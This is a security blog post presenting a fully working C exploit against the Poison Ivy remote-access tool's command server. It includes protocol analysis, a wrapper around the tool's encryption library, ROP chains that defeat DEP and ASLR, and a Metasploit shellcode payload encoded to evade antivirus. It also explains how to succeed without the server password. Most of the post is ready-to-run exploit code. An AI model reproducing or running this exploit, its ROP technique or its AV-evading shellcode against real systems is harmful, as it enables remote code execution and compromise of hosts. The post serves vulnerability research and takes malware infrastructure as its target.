While working on Poison Ivy’s communication, one of my students approached me and asked me if the fact that an infected computer can connect to the C&C server means that the compromised host can break into the server. Well folks, it appears that it’s possible. We will now present a fully working exploit for all Windows platforms (i.e., bypassing DEP and ASLR), allowing a computer infected by Poison Ivy (or any other computer, for that matter) to assume control of PI’s C&C server.
As we already know, Poison Ivy’s initial communication sequence goes as follows:
- The client contacts the server and sends 256 bytes of data (challenge).
- The server encrypts the data and sends it back (response).
- The server sends an encrypted command (machine code) to the client (preceded by a cleartext length DWORD).
- The client sends the infected computer’s encrypted details to the server.
Steps 3 and 4 are somewhat interchangeable. In any case, we’ll be attacking step 4. This sort of attack has already been investigated by Andrzej Dereszowski, but some details were omitted, and the exploit was very limited in nature (and not disclosed).
First, let’s see what bytes the client sends to the server in step 4:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
unsigned char client_details[] =
{
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00,
0xC2, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB8, 0xB0, 0x00, 0x00, 0x00, 0x09, 0x6D, 0x79, 0x70, 0x72, 0x6F, 0x00, 0x66, 0x67, 0x61, 0x6C,
0x00, 0xC0, 0xA8, 0x0D, 0x00, 0x01, 0x02, 0x58, 0x33, 0x04, 0x55, 0x73, 0x65, 0x80, 0x72, 0x01,
0x9C, 0x00, 0x00, 0x00, 0x05, 0x00, 0x18, 0x82, 0x01, 0x00, 0x0C, 0x28, 0x0A, 0x00, 0x00, 0x02,
0x00, 0x1C, 0x00, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20, 0x00, 0x50, 0x61, 0x63, 0x6B,
0x20, 0x33, 0x00, 0x7C, 0x01, 0x00, 0x48, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x48, 0xBB, 0x00, 0x14,
0x00, 0x00, 0xE0, 0xFD, 0x7F, 0x94, 0xFE, 0x80, 0x9F, 0x00, 0x17, 0x83, 0x91, 0x7C, 0x35, 0x00,
0x06, 0x00, 0x00, 0x1E, 0x15, 0x00, 0x08, 0x00, 0xA0, 0x00, 0x80, 0xE0, 0x50, 0x88, 0x7C, 0x00,
0x3E, 0x15, 0x01, 0x54, 0x80, 0x00, 0xE8, 0xE0, 0x80, 0x7C, 0xF8, 0x1D, 0x01, 0x16, 0x30, 0x14,
0x00, 0x0C, 0x01, 0x00, 0xB2, 0x00, 0x46, 0x00, 0x00, 0xB8, 0x14, 0x00, 0xA0, 0x00, 0x37, 0x01,
0x2F, 0x01, 0x0B, 0xAC, 0x00, 0x0B, 0x20, 0xC3, 0x31, 0x91, 0x7C, 0xDF, 0x00, 0x03, 0x08, 0x06,
0xD6, 0x14, 0x02, 0x43, 0x00, 0x29, 0x00, 0x01, 0x03, 0x03, 0x01, 0x45, 0x00, 0x37, 0x00, 0x66,
0x2F, 0x5F, 0x47, 0x00, 0xC0, 0xF7, 0x1F, 0x02, 0xE7, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00,
}; |
The data given here provides the server with the following information:
When analyzing the PI server (it’s packed with ExeStealth, BTW), we see that it first reads 0×20 bytes of client data (i.e., the header), parses that header, and acts accordingly. Some interesting values in the header:
- The 1st DWORD is either 4 or not. A value of 4 involves taking a different branch that doesn’t interest us.
- The 3rd DWORD indicates the number of additional bytes to read from the socket after reading the header (i.e., the data).
- The 4th DWORD is the number of relevant data bytes in the data that’s going to be read from the socket.
- The 5th DWORD is the real size of the relevant data. If this is bigger than the 4th DWORD, the read data should be decompressed using RtlDecompressBuffer.
- The 6th DWORD is the size of the buffer to allocate for the (uncompressed) relevant data. This has nothing to do with the buffer for reading the data from the socket, which is simply a local array variable, residing on the stack.
If you think this construction is weird, you’re absolutely right. Either the author did it so he can have a backdoor via an exploit, or I’m giving him way too much credit. Either way, this header screams “exploit me!”, and in this case, I don’t mind being a pleaser.
First thing’s first. If we want to transfer our own header, we need to encrypt it. We use what we already know about Poison Ivy’s crypto system, and utilize PI’s own PILib.dll to our advantage:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#ifndef __CAMMELIA_H
#define __CAMMELIA_H
#include <windows.h>
#define CAMELLIA_LIBRARY "PILIB.DLL"
#define CAMELLIA_SCHEDULE_KEYS "C_SK"
#define CAMELLIA_ENCRYPT "C_E"
#define CAMELLIA_DECRYPT "C_D"
#define CAMELLIA_BLOCK_SIZE 16
#define CAMELLIA_KEY_LEN (256 / 8)
/* Not accurate - just needs to be big enough */
#define CAMELLIA_ALL_KEYS_LEN 1024
int loadCamellia(const char *key, unsigned int len);
/* encrypt() and decrypt() require len to be a multiple of CAMELLIA_BLOCK_SIZE */
void encrypt(unsigned char *data, int len);
void deccrypt(unsigned char *data, int len);
void unloadCamellia();
#endif |
And the actual code (note that Camellia is a block cipher):
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
#include <windows.h>
#include "Camellia.h"
typedef int (__stdcall *c_sk_t)(unsigned char *, unsigned char *);
typedef int (__stdcall *c_e_t)(unsigned char *, unsigned char *, unsigned char *);
typedef int (__stdcall *c_d_t)(unsigned char *, unsigned char *, unsigned char *);
HMODULE hMod = NULL;
c_sk_t c_sk = NULL;
c_e_t c_e = NULL;
c_d_t c_d = NULL;
unsigned char all_keys[CAMELLIA_ALL_KEYS_LEN] = {0};
int loadCamellia(const char *key, unsigned int len) {
unsigned char c_key[CAMELLIA_KEY_LEN] = {0};
if ((hMod = LoadLibrary(CAMELLIA_LIBRARY)) == NULL)
return FALSE;
if ((c_sk = (c_sk_t)GetProcAddress(hMod, CAMELLIA_SCHEDULE_KEYS)) == NULL ||
(c_e = (c_e_t)GetProcAddress(hMod, CAMELLIA_ENCRYPT)) == NULL ||
(c_d = (c_d_t)GetProcAddress(hMod, CAMELLIA_DECRYPT)) == NULL) {
FreeLibrary(hMod);
return FALSE;
}
memcpy(c_key, key, len <= CAMELLIA_KEY_LEN ? len : CAMELLIA_KEY_LEN);
c_sk(c_key, all_keys);
return TRUE;
}
void encrypt(unsigned char *data, int len) {
int idx;
/* Make sure len is a multiple of CAMELLIA_BLOCK_SIZE */
if (len % CAMELLIA_BLOCK_SIZE > 0)
return;
for (idx = 0; idx < len; idx += CAMELLIA_BLOCK_SIZE)
c_e(data + idx, data + idx, all_keys);
}
void decrypt(unsigned char *data, int len) {
int idx;
/* Make sure len is a multiple of CAMELLIA_BLOCK_SIZE */
if (len % CAMELLIA_BLOCK_SIZE > 0)
return;
for (idx = 0; idx < len; idx += CAMELLIA_BLOCK_SIZE)
c_d(data + idx, data + idx, all_keys);
}
void unloadCamellia() {
if (hMod != NULL)
FreeLibrary(hMod);
} |
PI’s C&C server creates a thread for each new connection. It’s that thread’s function that has the vulnerability. Here’s the buffer that we want to overflow:
Now, to the exploit. We want to indicate that there’s a lot of data to be sent. However, we don’t want to send that much data, because if we break the connection we can quickly get to the overwritten return address. We must keep in mind, though, that we can’t break the connection before all of the data we wanted to send was actually received by the other side. This way, we get both the overflow, and the quick exit. We also note that PI was built so that threads can terminate without affecting the server, which is an attribute we’re going to use to exit cleanly from our shellcode.
Ok, so we can overwrite the return address, but where should we point it to? The thread’s stack is not executable, and we don’t even know where it is. However, the PI server’s executable doesn’t support ASLR, so we know exactly where it is (as a side note, all of its sections are marked RWX). We’re going to construct a ROP chain that calls VirtualProtect and makes the stack executable, so we can run our code. The problem is we don’t have much of a stack to work with when the function returns, having that this is a function directly called by CreateThread. This is all the stack space we have:
So, using the helpful assistance of mona.py, we manually create a ROP chain to take us back 0×8000 bytes to where the stack was, so we can have a bigger ROP chain there that calls VirtualProtect on 0×4000 stack bytes (which is more than enough for any shellcode you might want to run). One last thing to remember is that EIP and ESP are the same when the shellcode starts to run, so it’s important not to write things on the stack that will destroy the shellcode. We deal with it by subtracting 0×40 from ESP upon entering our shellcode, so we have some space for local variables.
See the inline comments in the code below for specific details on the ROP chains and the shellcode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 |
/* Poison Ivy own-the-owner exploit by Gal Badishi, http://www.badishi.com */
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
#include "Camellia.h"
#define PI_CLIENT_PASS "admin"
#define PI_CLIENT_PASS_LEN 5
#define PI_SERVER_IP "192.168.13.2"
#define PI_SERVER_PORT 3460
#define HANDSHAKE_SIZE 256
#define CLIENT_DETAILS_SIZE 0x8095
#define CLIENT_DETAILS_HEADER_SIZE 0x20
#define SHORT_ROP_CHAIN_POS 0x806D // Overwritten return address is here
#define LONG_ROP_CHAIN_POS (SHORT_ROP_CHAIN_POS - 0x7FF0)
/*
* The buffer is long enough for an overflow, but all we need is the first 0x20 header bytes.
* To get straight to the end of the function after the overflow, we declare a bigger size
* than our actual buffer (0x10000 vs. 0x8095), and drop the connection after sending our buf.
* These 0x20 bytes are the only things that need to get encrypted. In fact, it might work
* even without encryption! (Thus, you might not need to know the password, but then you
* might not succeed on the first shot, and you'll have to at least play with the size.
* The number of bytes after the header is given by the 3rd DWORD in the header.
*/
unsigned char client_details[CLIENT_DETAILS_SIZE] =
{
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xBB, 0x00, 0x00, 0x00,
0xC2, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
unsigned int short_ROP_chain[] = {
0x0041F1E9, // 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x00401000, // Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
0xFFFF8000, // edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
0x0042F63A, // Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000000, // edi (ebp points here now)
0x00000000, // esi
0x00000000, // ebx
0x00426799, // We need this to offset ebp: mov eax,edx # retn
0x0041F337, // Subtract 0x8000 from ebp: add ebp,eax # retn
0x00403A77 // mov esp,ebp # pop ebp # retn
};
unsigned int long_ROP_chain[] = {
0x00000000, // New ebp
0x0041F1E9, // Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x0000002C, // edx. We'll add this number later to ebp, to prevent looping.
0x0042F63A, // Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000001, // edi. We need it when we call VirtualProtect (ebp points here now)
0x00000000, // esi
0x00000000, // ebx
0x00426799, // We need this to offset ebp: mov eax,edx # retn
0x0041F337, // Subtract 0x8000 from ebp: add ebp,eax # retn
0x004D82DE, // eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
0x004F196E, // push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
0x00004000, // Size
0x00000040, // New protect (0x40 = PAGE_EXECUTE_READWRITE)
0x00401000, // Old protect (ptr)
0x00000000, // esi
0x00000000, // ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
0x0041AA97, // jmp esp (also new ebp)
0x00000000, // Discarded
0x00000000 // Discarded
// The shellcode goes here (this is going to be esp)
};
/*
* windows/exec
* http://www.metasploit.com
* VERBOSE=false, EXITFUNC=thread,
* CMD=calc.exe
*
* Encoded using shikata_ga_nai due to AV detection
*/
unsigned char payload[] =
"\x83\xec\x40" // sub esp,40 - esp is our eip and that's a problem
"\xdd\xc4\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x33\xb8\x7f\x6b\x1c"
"\xe9\x83\xed\xfc\x31\x45\x13\x03\x3a\x78\xfe\x1c\x38\x96\x77"
"\xde\xc0\x67\xe8\x56\x25\x56\x3a\x0c\x2e\xcb\x8a\x46\x62\xe0"
"\x61\x0a\x96\x73\x07\x83\x99\x34\xa2\xf5\x94\xc5\x02\x3a\x7a"
"\x05\x04\xc6\x80\x5a\xe6\xf7\x4b\xaf\xe7\x30\xb1\x40\xb5\xe9"
"\xbe\xf3\x2a\x9d\x82\xcf\x4b\x71\x89\x70\x34\xf4\x4d\x04\x8e"
"\xf7\x9d\xb5\x85\xb0\x05\xbd\xc2\x60\x34\x12\x11\x5c\x7f\x1f"
"\xe2\x16\x7e\xc9\x3a\xd6\xb1\x35\x90\xe9\x7e\xb8\xe8\x2e\xb8"
"\x23\x9f\x44\xbb\xde\x98\x9e\xc6\x04\x2c\x03\x60\xce\x96\xe7"
"\x91\x03\x40\x63\x9d\xe8\x06\x2b\x81\xef\xcb\x47\xbd\x64\xea"
"\x87\x34\x3e\xc9\x03\x1d\xe4\x70\x15\xfb\x4b\x8c\x45\xa3\x34"
"\x28\x0d\x41\x20\x4a\x4c\x0f\xb7\xde\xea\x76\xb7\xe0\xf4\xd8"
"\xd0\xd1\x7f\xb7\xa7\xed\x55\xfc\x48\x0c\x7c\x08\xe1\x89\x15"
"\xb1\x6c\x2a\xc0\xf5\x88\xa9\xe1\x85\x6e\xb1\x83\x80\x2b\x75"
"\x7f\xf8\x24\x10\x7f\xaf\x45\x31\x1c\x2e\xd6\xd9\xcd\xd5\x5e"
"\x7b\x12";
void bail_out(const char *msg, SOCKET sock) {
printf("%s\n", msg);
if (sock != INVALID_SOCKET) {
shutdown(sock, SD_BOTH);
closesocket(sock);
WSACleanup();
}
unloadCamellia();
exit(1);
}
SOCKET connect_to_PI_server(const char *ip, unsigned short port) {
unsigned long ulAddr;
struct sockaddr_in addr;
WSADATA wsaData;
SOCKET sock;
if ((ulAddr = inet_addr(ip)) == INADDR_NONE || ulAddr == INADDR_ANY)
bail_out("Wrong IP address format", INVALID_SOCKET);
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
bail_out("Cannot initialize Winsock", INVALID_SOCKET);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
WSACleanup();
bail_out("Cannot create socket", INVALID_SOCKET);
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = ulAddr;
addr.sin_port = htons(port);
if (connect(sock, (const sockaddr *) &addr, sizeof(addr)) == SOCKET_ERROR)
bail_out("Cannot connect to PI server", sock);
return sock;
}
/* Send 256 bytes of data (challenge) and get them encrypted (response) */
void handshake(SOCKET sock) {
char buf[HANDSHAKE_SIZE] = {0};
if (send(sock, buf, HANDSHAKE_SIZE, 0) == SOCKET_ERROR)
bail_out("Cannot send handshake", sock);
if (recv(sock, buf, HANDSHAKE_SIZE, 0) < HANDSHAKE_SIZE)
bail_out("Error receiving handshake", sock);
}
void recv_command(SOCKET sock) {
int len, recv_len;
char temp[0x100];
if (recv(sock, (char *) &len, sizeof(len), 0) < sizeof(len))
bail_out("Cannot get command size", sock);
printf("Waiting for command...\n");
Sleep(2000);
do {
int bytes_to_read = len > 0x100 ? 0x100 : len;
if ((recv_len = recv(sock, temp, bytes_to_read, 0)) < bytes_to_read)
bail_out("Cannot get command", sock);
len -= recv_len;
} while (len > 0);
}
void send_exploit(SOCKET sock) {
char client_details_enc[CLIENT_DETAILS_SIZE];
memcpy(client_details_enc, client_details, CLIENT_DETAILS_SIZE);
encrypt((unsigned char *) client_details_enc, CLIENT_DETAILS_HEADER_SIZE);
memcpy(client_details_enc + SHORT_ROP_CHAIN_POS, short_ROP_chain, sizeof(short_ROP_chain));
memcpy(client_details_enc + LONG_ROP_CHAIN_POS, long_ROP_chain, sizeof(long_ROP_chain));
/* The payload comes directly after the long ROP chain */
memcpy(client_details_enc + LONG_ROP_CHAIN_POS + sizeof(long_ROP_chain), payload, sizeof(payload));
printf("Sent 0x%X/0x%X bytes\n", send(sock, client_details_enc, CLIENT_DETAILS_SIZE, 0), CLIENT_DETAILS_SIZE);
}
int main() {
SOCKET sock = INVALID_SOCKET;
if (!loadCamellia(PI_CLIENT_PASS, PI_CLIENT_PASS_LEN))
bail_out("Cannot load Camellia DLL", INVALID_SOCKET);
sock = connect_to_PI_server(PI_SERVER_IP, PI_SERVER_PORT);
handshake(sock);
recv_command(sock);
send_exploit(sock);
printf("Count to 5...\n");
Sleep(5000);
shutdown(sock, SD_BOTH);
closesocket(sock);
WSACleanup();
unloadCamellia();
printf("Finished - Check to see if the exploit worked.\n");
return 0;
} |
The exploit was tested on Windows XP Service Pack 3, but should work without any problem on all Windows versions, as it bypasses DEP (using ROP chains and VirtualProtect) and ASLR (using the fact that the executable doesn’t support rebasing, and utilizing only relative addresses).
Exploiter’s view:
PI’s C&C server’s view:
Although the exploit presented here uses Poison Ivy’s own PILib.dll to encrypt the communication to the server, and thus the correct encryption key/password is needed, we can perform the exploitation quite reliably even without encrypting the data. For the exploit to be reliable, the server needs to see two things after decrypting the header:
- The first DWORD should not be 4.
- The third DWORD should be higher than the actual size of the data we send (minus the header).
For the first point, out of about 4 billion numbers, only one poses a problem. In fact, we can just send the number 4, and assume that it’s not going to get decrypted back to 4 (i.e., the encryption wouldn’t have done anything to it). As for the second point, we observe that we send 0×8095 bytes, meaning that it suffices for the 3rd DWORD in the header to have one of its higher bytes not equal to 0. Following the same logic we used before, we can simply send zeros as the higher bytes.
It’s important to note that the exploit data following our header never gets decrypted, so we don’t have to worry about PI ruining our values if we don’t encrypt the data.
In light of this analysis, a Metasploit module without encryption is being prepared.






great post, nice job!
Thanks!
This gotta be the second coolest remote exploit I have seen in my entire life. Pwnd a PI C&C this is just to funny
What’s the first?
Just an old habit i got from Monkey Island